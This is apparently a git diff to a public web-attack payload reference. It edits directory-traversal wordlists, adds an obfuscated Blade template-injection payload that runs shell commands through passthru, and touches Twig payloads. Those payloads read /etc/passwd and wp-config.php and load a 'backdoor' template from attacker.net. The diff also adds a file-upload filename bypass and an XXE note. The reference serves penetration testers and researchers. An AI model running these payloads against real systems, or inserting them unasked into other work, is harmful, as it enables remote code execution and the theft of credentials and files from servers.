diff --git a/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt b/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt index 5fbaded549..05ea1a92c5 100644 --- a/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt +++ b/Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt @@ -877,11 +877,11 @@ /..\..\\..\..\\..\..\\\{FILE} /..\..\\..\..\\..\..\\..\\\{FILE} /..\..\\..\..\\..\..\\..\..\\\{FILE} -/\..%2f -/\..%2f\..%2f -/\..%2f\..%2f\..%2f -/\..%2f\..%2f\..%2f\..%2f -/\..%2f\..%2f\..%2f\..%2f\..%2f -/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f -/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f +/\..%2f{FILE} +/\..%2f\..%2f{FILE} +/\..%2f\..%2f\..%2f{FILE} +/\..%2f\..%2f\..%2f\..%2f{FILE} +/\..%2f\..%2f\..%2f\..%2f\..%2f{FILE} +/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE} +/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE} /\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE} diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index 4e69a37baa..0192f55adf 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -38,6 +38,7 @@ - [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility - [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations - [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs +- [dolevf/graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility - [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph - [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index f8502ad68a..cc3618c315 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -21,21 +21,34 @@ ## Templating Libraries -| Template Name | Payload Format | -| -------------- | --------- | -| Laravel Blade | `{{ }}` | -| Latte | `{var $X=""}{$X}` | -| Mustache | `{{ }}` | -| Plates | `` | -| Smarty | `{ }` | -| Twig | `{{ }}` | +| Template Name | Payload Format | +| --------------- | --------- | +| Blade (Laravel) | `{{ }}` | +| Latte | `{var $X=""}{$X}` | +| Mustache | `{{ }}` | +| Plates | `` | +| Smarty | `{ }` | +| Twig | `{{ }}` | + +## Blade + +[Official website](https://laravel.com/docs/master/blade) +> Blade is the simple, yet powerful templating engine that is included with Laravel. + +The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr(114),[105,100]))}}`. + +```php +{{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}} +``` + +--- ## Smarty [Official website](https://www.smarty.net/docs/en/) > Smarty is a template engine for PHP. -```python +```php {$smarty.version} {php}echo `id`;{/php} //deprecated in smarty v3 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} @@ -52,7 +65,7 @@ ### Twig - Basic Injection -```python +```php {{7*7}} {{7*'7'}} would result in 49 {{dump(app)}} @@ -62,7 +75,7 @@ ### Twig - Template Format -```python +```php $output = $twig > render ( 'Dear' . $_GET['custom_greeting'], array("first_name" => $user.first_name) @@ -76,14 +89,14 @@ $output = $twig > render ( ### Twig - Arbitrary File Reading -```python +```php "{{'/etc/passwd'|file_excerpt(1,30)}}"@ {{include("wp-config.php")}} ``` ### Twig - Code Execution -```python +```php {{self}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} @@ -249,4 +262,5 @@ layout template: ## References +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) - [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58) diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index 87137471de..056d605710 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -406,3 +406,4 @@ PoC : - [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) +- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits) diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 2047d0c3c6..75f5aa94b2 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -102,6 +102,7 @@ Other extensions that can be abused to trigger other vulnerabilities. * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp` * Multiple special characters: `file.jsp/././././.` + * UTF8 filename: `Content-Disposition: form-data; name="anyBodyParam"; filename*=UTF8''myfile%0a.txt` * On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php". * On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php". diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 6c02302290..eb642671e9 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -68,6 +68,13 @@ Basic entity test, when the XML parser parses the external entities the result s It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server. +These are different types of entities in XML: + +| Type | Prefix | Where usable | +| ---------------- | -------- | --------------------------- | +| General entity | `&name;` | Inside XML document content | +| Parameter entity | `%name;` | Only inside the DTD | + ## Exploiting XXE to Retrieve Files ### Classic XXE @@ -155,7 +162,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo - + ]> &xxe; ``` diff --git a/_LEARNING_AND_SOCIALS/YOUTUBE.md b/_LEARNING_AND_SOCIALS/YOUTUBE.md index c6223bf879..7fea856c17 100644 --- a/_LEARNING_AND_SOCIALS/YOUTUBE.md +++ b/_LEARNING_AND_SOCIALS/YOUTUBE.md @@ -19,6 +19,7 @@ - [Jack Rhysider - Darknet Diaries](https://www.youtube.com/@JackRhysider) - [John Hammond - Wargames and CTF writeups](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw) - [Laluka - OffenSkill - Sharing is Caring](https://www.youtube.com/@TheLaluka) +- [LaurieWired - reverse engineering and research](https://www.youtube.com/@lauriewired) - [LiveOverflow - Explore weird machines...](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) - [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A) - [Nahamsec](https://www.youtube.com/c/Nahamsec) @@ -30,6 +31,7 @@ - [STÖK](https://www.youtube.com/c/STOKfredrik) - [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw) - [The Hated one](https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q) +- [Tib3rius - CTF walkthroughs, deep dives, web app hacking, and more!](https://www.youtube.com/@tib3rius) - [xct hacks](https://www.youtube.com/@xct_de) ## Conferences